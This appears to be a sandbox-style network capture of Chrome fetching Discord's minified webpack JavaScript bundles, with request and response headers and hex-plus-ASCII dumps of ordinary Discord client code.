                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC964INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:46 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 17667
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0e7bf0cc341-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "27ded6c70d643b2405057d268b1544be"
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 13:28:33 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eMvy6aeNZDaQ0HFzb5IUBn2qgIqceRQwyCgb6crX7yKiWr5uysm9NONivm%2BEbPqxS5h%2F0vyOW1%2Blw7fw8EznT0ei1VVBXvT86ups6z3mbFkqB2%2FfID9ZeQrJ6i2c"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC405INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 35 37 38 38 22 5d 2c 7b 35 33 33 33 30 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6c 65 74 20 72 3b 76 61 72 20 69 3d 6e 28 35 34 34 38 39 31 29 2c 73 3d 6e 28 35 37 30 31 34 30 29 2c 6c 3d 6e 28 37 32 38 33 34 35 29 2c 6f 3d 6e 28 38 31 32 32 30 36 29 2c 61 3d 6e 28 36 32 35 31 32 38 29 2c 63 3d 6e 28 33 33 35 31 33 31 29 2c 64 3d 6e 28 36 36 39 30 37 39 29 2c 75 3d 6e 28 39 38 31 36 33 31 29 2c 5f 3d 6e 28 34 37 34 39 33 36 29 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 45 28 65 29 7b
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["25788"],{533307:function(e,t,n){let r;var i=n(544891),s=n(570140),l=n(728345),o=n(812206),a=n(625128),c=n(335131),d=n(669079),u=n(981631),_=n(474936);async function E(e){
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 52 45 53 4f 4c 56 45 22 2c 63 6f 64 65 3a 65 7d 29 3b 74 72 79 7b 6c 65 74 20 72 3d 61 77 61 69 74 20 28 30 2c 64 2e 62 54 29 28 65 2c 74 2c 6e 29 3b 69 66 28 6e 75 6c 6c 21 3d 72 2e 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 26 26 72 2e 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 21 3d 3d 5f 2e 43 4c 29 7b 6c 65 74 20 65 3d 6f 2e 5a 2e 67 65 74 41 70 70 6c 69 63 61 74 69 6f 6e 28 72 2e 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 29 3b 69 66 28 6e 75 6c 6c 3d 3d 65 29 74 72 79 7b 61 77 61 69 74 20 6c 2e 5a 50 2e 66 65 74 63 68 41 70 70 6c 69 63 61 74 69 6f 6e 28 72 2e 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 69 66 28 72 2e 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 3d 3d 3d 75 2e 58 41 4a 29 74 72 79 7b 61 77 61 69 74 20
                                                                                                                                                                                                                                                                                    Data Ascii: RESOLVE",code:e});try{let r=await (0,d.bT)(e,t,n);if(null!=r.application_id&&r.application_id!==_.CL){let e=o.Z.getApplication(r.application_id);if(null==e)try{await l.ZP.fetchApplication(r.application_id)}catch(e){}}if(r.application_id===u.XAJ)try{await
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 46 54 5f 43 4f 44 45 5f 43 52 45 41 54 45 5f 53 55 43 43 45 53 53 22 2c 67 69 66 74 43 6f 64 65 3a 72 2e 62 6f 64 79 7d 29 2c 72 2e 62 6f 64 79 7d 63 61 74 63 68 28 6e 29 7b 73 2e 5a 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 49 46 54 5f 43 4f 44 45 5f 43 52 45 41 54 45 5f 46 41 49 4c 55 52 45 22 2c 73 6b 75 49 64 3a 65 2c 73 75 62 73 63 72 69 70 74 69 6f 6e 50 6c 61 6e 49 64 3a 74 7d 29 7d 7d 2c 61 73 79 6e 63 20 72 65 76 6f 6b 65 47 69 66 74 43 6f 64 65 28 65 29 7b 73 2e 5a 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 49 46 54 5f 43 4f 44 45 5f 52 45 56 4f 4b 45 22 2c 63 6f 64 65 3a 65 7d 29 3b 74 72 79 7b 61 77 61 69 74 20 69 2e 74 6e 2e 64 65 6c 28 7b 75 72 6c 3a 75 2e 41 4e 4d 2e 55 53 45 52 5f 47 49 46 54 5f 43 4f 44 45 5f 52 45
                                                                                                                                                                                                                                                                                    Data Ascii: FT_CODE_CREATE_SUCCESS",giftCode:r.body}),r.body}catch(n){s.Z.dispatch({type:"GIFT_CODE_CREATE_FAILURE",skuId:e,subscriptionPlanId:t})}},async revokeGiftCode(e){s.Z.dispatch({type:"GIFT_CODE_REVOKE",code:e});try{await i.tn.del({url:u.ANM.USER_GIFT_CODE_RE
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 28 36 38 36 35 34 36 29 2c 75 3d 6e 28 35 36 35 31 33 38 29 2c 5f 3d 6e 28 36 30 31 39 36 34 29 2c 45 3d 6e 28 35 39 38 30 37 37 29 2c 68 3d 6e 28 33 38 38 30 33 32 29 2c 70 3d 6e 28 33 32 35 39 32 39 29 3b 6c 65 74 20 66 3d 65 3d 3e 7b 76 61 72 20 74 3b 6c 65 74 7b 73 70 65 61 6b 65 72 3a 6e 2c 67 75 69 6c 64 49 64 3a 69 2c 69 73 45 6d 62 65 64 3a 73 7d 3d 65 2c 6c 3d 6e 65 77 20 45 2e 5a 28 6e 2e 75 73 65 72 29 3b 72 65 74 75 72 6e 28 30 2c 72 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 70 2e 73 70 65 61 6b 65 72 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 72 2e 6a 73 78 29 28 6f 2e 41 76 61 74 61 72 2c 7b 73 72 63 3a 6c 2e 67 65 74 41 76 61 74 61 72 55 52 4c 28 69 2c 73 3f 31 36 3a 32 34 29 2c 73 69 7a 65 3a 73 3f 6f 2e 41 76
                                                                                                                                                                                                                                                                                    Data Ascii: (686546),u=n(565138),_=n(601964),E=n(598077),h=n(388032),p=n(325929);let f=e=>{var t;let{speaker:n,guildId:i,isEmbed:s}=e,l=new E.Z(n.user);return(0,r.jsxs)("div",{className:p.speaker,children:[(0,r.jsx)(o.Avatar,{src:l.getAvatarURL(i,s?16:24),size:s?o.Av
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 6d 61 6c 22 2c 63 68 69 6c 64 72 65 6e 3a 6c 7d 29 5d 7d 29 7d 3b 74 2e 5a 3d 65 3d 3e 7b 76 61 72 20 74 3b 6c 65 74 7b 73 74 61 67 65 49 6e 73 74 61 6e 63 65 3a 6e 2c 67 75 69 6c 64 3a 73 2c 69 73 43 61 72 64 3a 45 3d 21 31 2c 69 73 45 6d 62 65 64 3a 53 3d 21 31 2c 6f 6e 43 6c 69 63 6b 3a 6d 7d 3d 65 2c 43 3d 69 2e 75 73 65 4d 65 6d 6f 28 28 29 3d 3e 6e 75 6c 6c 3d 3d 73 3f 6e 75 6c 6c 3a 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 5a 50 3f 73 3a 6e 65 77 20 5f 2e 5a 50 28 73 29 2c 5b 73 5d 29 3b 69 66 28 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 75 6c 6c 3d 3d 43 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 7b 74 6f 70 69 63 3a 67 2c 73 70 65 61 6b 65 72 5f 63 6f 75 6e 74 3a 49 2c 70 61 72 74 69 63 69 70 61 6e 74 5f 63 6f 75 6e 74 3a 41 7d 3d 6e 2c 79 3d 6e 75
                                                                                                                                                                                                                                                                                    Data Ascii: mal",children:l})]})};t.Z=e=>{var t;let{stageInstance:n,guild:s,isCard:E=!1,isEmbed:S=!1,onClick:m}=e,C=i.useMemo(()=>null==s?null:s instanceof _.ZP?s:new _.ZP(s),[s]);if(null==n||null==C)return null;let{topic:g,speaker_count:I,participant_count:A}=n,y=nu
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 3a 53 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 67 7d 29 2c 28 30 2c 72 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6c 28 29 28 70 2e 6d 65 6d 62 65 72 73 2c 7b 5b 70 2e 65 6d 62 65 64 5d 3a 53 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 5b 52 2e 6c 65 6e 67 74 68 3e 30 26 26 28 30 2c 72 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 70 2e 73 70 65 61 6b 65 72 73 2c 63 68 69 6c 64 72 65 6e 3a 5b 52 2e 6d 61 70 28 65 3d 3e 28 30 2c 72 2e 6a 73 78 29 28 66 2c 7b 73 70 65 61 6b 65 72 3a 65 2c 67 75 69 6c 64 49 64 3a 43 2e 69 64 2c 69 73 45 6d 62 65 64 3a 53 7d 2c 65 2e 75 73 65 72 2e 69 64 29 29 2c 4f 3e 30 3f 28 30 2c 72 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 70 2e 73 70 65 61 6b 65 72
                                                                                                                                                                                                                                                                                    Data Ascii: :S}),children:g}),(0,r.jsxs)("div",{className:l()(p.members,{[p.embed]:S}),children:[R.length>0&&(0,r.jsxs)("div",{className:p.speakers,children:[R.map(e=>(0,r.jsx)(f,{speaker:e,guildId:C.id,isEmbed:S},e.user.id)),O>0?(0,r.jsxs)("div",{className:p.speaker
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 44 45 45 50 5f 4c 49 4e 4b 5f 43 4c 49 43 4b 45 44 2c 7b 66 69 6e 67 65 72 70 72 69 6e 74 3a 28 30 2c 6f 2e 4b 29 28 6e 2e 66 69 6e 67 65 72 70 72 69 6e 74 29 2c 61 74 74 65 6d 70 74 5f 69 64 3a 6e 2e 61 74 74 65 6d 70 74 49 64 2c 73 6f 75 72 63 65 3a 6e 2e 75 74 6d 53 6f 75 72 63 65 7d 29 2c 45 2e 5a 2e 6c 61 75 6e 63 68 28 74 2c 65 3d 3e 7b 21 65 26 26 28 30 2c 63 2e 64 4c 29 28 75 2e 5a 2e 66 61 6c 6c 62 61 63 6b 52 6f 75 74 65 29 7d 29 7d 7d 2c 31 34 34 31 31 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 4c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 72 2c 69 2c 73 3d 6e 28 39 39 30 35 34 37 29 2c 6c 3d 6e 28 35 34 34 38 39 31 29 2c 6f 3d 6e 28 35 37 30 31 34 30 29 2c 61 3d 6e 28 33
                                                                                                                                                                                                                                                                                    Data Ascii: DEEP_LINK_CLICKED,{fingerprint:(0,o.K)(n.fingerprint),attempt_id:n.attemptId,source:n.utmSource}),E.Z.launch(t,e=>{!e&&(0,c.dL)(u.Z.fallbackRoute)})}},144114:function(e,t,n){n.d(t,{L:function(){return i}});var r,i,s=n(990547),l=n(544891),o=n(570140),a=n(3
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 21 31 7d 29 2c 72 65 76 65 72 69 66 79 50 68 6f 6e 65 3a 28 65 2c 74 2c 6e 29 3d 3e 6c 2e 74 6e 2e 70 6f 73 74 28 7b 75 72 6c 3a 75 2e 41 4e 4d 2e 50 48 4f 4e 45 5f 52 45 56 45 52 49 46 59 2c 62 6f 64 79 3a 7b 70 68 6f 6e 65 5f 74 6f 6b 65 6e 3a 65 2c 70 61 73 73 77 6f 72 64 3a 74 2c 63 68 61 6e 67 65 5f 70 68 6f 6e 65 5f 72 65 61 73 6f 6e 3a 6e 7d 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 2c 72 65 6a 65 63 74 57 69 74 68 45 72 72 6f 72 3a 21 31 7d 29 2c 76 61 6c 69 64 61 74 65 50 68 6f 6e 65 46 6f 72 53 75 70 70 6f 72 74 3a 65 3d 3e 6c 2e 74 6e 2e 70 6f 73 74 28 7b 75 72 6c 3a 75 2e 41 4e 4d 2e 56 45 52 49 46 59 5f 50 48 4f 4e 45 5f 46 4f 52 5f 54 49 43 4b 45 54 2c 62 6f 64 79 3a 7b 74 6f 6b 65 6e 3a 65 7d 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72
                                                                                                                                                                                                                                                                                    Data Ascii: !1}),reverifyPhone:(e,t,n)=>l.tn.post({url:u.ANM.PHONE_REVERIFY,body:{phone_token:e,password:t,change_phone_reason:n},oldFormErrors:!0,rejectWithError:!1}),validatePhoneForSupport:e=>l.tn.post({url:u.ANM.VERIFY_PHONE_FOR_TICKET,body:{token:e},oldFormError
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 31 39 34 39 36 29 2c 64 3d 6e 28 38 30 31 34 36 31 29 2c 75 3d 6e 28 33 38 38 30 33 32 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 28 65 29 7b 6c 65 74 20 74 3d 21 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 7c 7c 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 2e 5a 50 2e 67 65 74 55 73 65 72 41 76 61 74 61 72 55 52 4c 28 7b 69 64 3a 65 2e 69 64 2c 61 76 61 74 61 72 3a 65 2e 61 76 61 74 61 72 2c 62 6f 74 3a 65 2e 62 6f 74 2c 64 69 73 63 72 69 6d 69 6e 61 74 6f 72 3a 22 30 30 30 30 22 7d 2c 74 2c 38 30 29 7d 66 75 6e 63 74 69 6f 6e 20 45 28 65 29 7b 6c 65 74 20 74 3d 28 30 2c 61 2e 5f 49 29 28 65 2e 75 73 65 72 6e 61 6d 65 29 2e 72 65 70 6c 61 63 65 28 64 2e 52 4e
                                                                                                                                                                                                                                                                                    Data Ascii: 19496),d=n(801461),u=n(388032);function _(e){let t=!(arguments.length>1)||void 0===arguments[1]||arguments[1];return l.ZP.getUserAvatarURL({id:e.id,avatar:e.avatar,bot:e.bot,discriminator:"0000"},t,80)}function E(e){let t=(0,a._I)(e.username).replace(d.RN
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC1369INData Raw: 73 61 67 65 3a 75 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 75 2e 74 2e 6d 43 72 41 55 56 29 7d 29 29 2e 77 69 74 68 28 7b 65 72 72 6f 72 3a 73 2e 50 2e 6e 75 6c 6c 69 73 68 7d 2c 28 29 3d 3e 28 7b 74 79 70 65 3a 63 2e 4b 2e 49 4e 54 45 52 4e 41 4c 5f 45 52 52 4f 52 2c 6d 65 73 73 61 67 65 3a 22 22 7d 29 29 2e 6f 74 68 65 72 77 69 73 65 28 28 29 3d 3e 76 6f 69 64 20 30 29 7d 66 75 6e 63 74 69 6f 6e 20 49 28 65 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 44 61 74 65 28 32 30 32 34 2c 32 2c 34 29 2e 74 6f 4c 6f 63 61 6c 65 44 61 74 65 53 74 72 69 6e 67 28 65 2c 7b 6d 6f 6e 74 68 3a 22 6c 6f 6e 67 22 2c 64 61 79 3a 22 6e 75 6d 65 72 69 63 22 2c 79 65 61 72 3a 22 6e 75 6d 65 72 69 63 22 7d 29 7d 7d 2c 31 30 38 34 32 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29
                                                                                                                                                                                                                                                                                    Data Ascii: sage:u.intl.string(u.t.mCrAUV)})).with({error:s.P.nullish},()=>({type:c.K.INTERNAL_ERROR,message:""})).otherwise(()=>void 0)}function I(e){return new Date(2024,2,4).toLocaleDateString(e,{month:"long",day:"numeric",year:"numeric"})}},108427:function(e,t,n)


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    91192.168.2.549811162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC862OUTGET /assets/ed216fb74081c12ffece.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC972INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:46 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 11029
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0e7ff4d424d-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "0d550ea88632fd7bbe604d65e78b2e79"
                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 15 Nov 2024 23:00:49 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OhOj0iVwppEkbFyPMD6WBDpAzVRfRuGc%2FuC944TLvIZek9vyBjRvQQoMuMpxgNC%2B%2FfHIxLgY5Gt8NsP43jv%2FCDgq%2B%2BNy%2BQc0ti1UmjdBe%2BilcGJeTUG8Bk0lON2y"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC397INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 35 32 30 33 30 22 5d 2c 7b 34 38 35 35 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 50 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 6c 3d 6e 28 33 38 38 30 33 32 29 3b 6c 65 74 20 69 3d 7b 67 65 74 20 77 65 62 61 75 74 68 6e 28 29 7b 72 65 74 75 72 6e 20 6c 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 6c 2e 74 2e 67 54 48 34 44 67 29 7d 2c 67 65 74 20 74 6f 74 70 28 29 7b 72 65 74 75 72 6e 20 6c 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 6c 2e 74
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["52030"],{48550:function(e,t,n){n.d(t,{P:function(){return i}});var l=n(388032);let i={get webauthn(){return l.intl.string(l.t.gTH4Dg)},get totp(){return l.intl.string(l.t
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 74 2e 76 68 53 52 4b 53 29 7d 7d 7d 2c 31 32 34 38 36 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 43 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 7d 2c 59 52 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 7d 7d 29 2c 6e 28 34 37 31 32 30 29 2c 6e 28 34 31 31 31 30 34 29 3b 76 61 72 20 6c 3d 6e 28 32 30 30 36 35 31 29 2c 69 3d 6e 28 31 39 32 33 37 39 29 2c 72 3d 6e 28 34 38 31 30 36 30 29 2c 73 3d 6e 28 34 34 37 30 39 37 29 2c 6f 3d 6e 28 38 37 33 31 32 34 29 2c 61 3d 6e 28 32 34 38 39 30 32 29 2c 64 3d 6e 28 31 36 30 35 31 31 29 2c 75 3d 6e 28 35 31 36 39 33 29 2c 63 3d 6e 28 39 37 33 38 31 30 29 2c 68 3d 6e 28 33 38 38 30 33 32 29 3b 66 75 6e 63 74 69 6f 6e 20 66 28 65 29 7b 76 61 72 20 74 2c
                                                                                                                                                                                                                                                                                    Data Ascii: t.vhSRKS)}}},124860:function(e,t,n){n.d(t,{Cd:function(){return f},YR:function(){return g}}),n(47120),n(411104);var l=n(200651),i=n(192379),r=n(481060),s=n(447097),o=n(873124),a=n(248902),d=n(160511),u=n(51693),c=n(973810),h=n(388032);function f(e){var t,
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 65 3a 74 2c 6d 66 61 46 69 6e 69 73 68 3a 6e 2c 6f 6e 43 6c 6f 73 65 3a 73 2c 6f 6e 45 61 72 6c 79 43 6c 6f 73 65 3a 73 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 67 28 65 2c 74 2c 6e 29 7b 28 30 2c 72 2e 6f 70 65 6e 4d 6f 64 61 6c 29 28 6e 3d 3e 28 30 2c 6c 2e 6a 73 78 29 28 6d 2c 7b 66 69 6e 69 73 68 3a 74 2c 6d 66 61 43 68 61 6c 6c 65 6e 67 65 3a 65 2c 2e 2e 2e 6e 7d 29 2c 7b 6f 6e 43 6c 6f 73 65 43 61 6c 6c 62 61 63 6b 3a 28 29 3d 3e 7b 6e 28 45 72 72 6f 72 28 68 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 68 2e 74 2e 4e 32 79 62 39 66 29 29 29 7d 7d 29 7d 7d 2c 35 30 37 34 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 6c 3d 6e 28 32 30 30 36 35 31 29 3b 6e 28 31 39 32 33 37 39 29 3b 76 61 72 20 69 3d 6e 28 34 38 31 30 36 30 29 2c 72
                                                                                                                                                                                                                                                                                    Data Ascii: e:t,mfaFinish:n,onClose:s,onEarlyClose:s})})}function g(e,t,n){(0,r.openModal)(n=>(0,l.jsx)(m,{finish:t,mfaChallenge:e,...n}),{onCloseCallback:()=>{n(Error(h.intl.string(h.t.N2yb9f)))}})}},507453:function(e,t,n){var l=n(200651);n(192379);var i=n(481060),r
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 6c 65 2c 63 68 69 6c 64 72 65 6e 3a 74 7d 29 2c 28 30 2c 6c 2e 6a 73 78 29 28 69 2e 4d 6f 64 61 6c 43 6c 6f 73 65 42 75 74 74 6f 6e 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6f 2e 63 6c 6f 73 65 42 75 74 74 6f 6e 2c 6f 6e 43 6c 69 63 6b 3a 6e 7d 29 5d 7d 29 7d 7d 7d 2c 34 34 37 30 39 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 7d 29 2c 6e 28 37 35 37 31 34 33 29 2c 6e 28 34 37 31 32 30 29 2c 6e 28 37 37 33 36 30 33 29 3b 76 61 72 20 6c 3d 6e 28 32 30 30 36 35 31 29 2c 69 3d 6e 28 31 39 32 33 37 39 29 2c 72 3d 6e 28 36 35 38 35 35 30 29 2c 73 3d 6e 28 34 38 31 30 36 30 29 2c 6f 3d 6e 28 35 30 37 34 35 33 29 2c 61 3d 6e 28 33 38 38 30 33 32 29 3b 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                                    Data Ascii: le,children:t}),(0,l.jsx)(i.ModalCloseButton,{className:o.closeButton,onClick:n})]})}}},447097:function(e,t,n){n.d(t,{Z:function(){return d}}),n(757143),n(47120),n(773603);var l=n(200651),i=n(192379),r=n(658550),s=n(481060),o=n(507453),a=n(388032);functio
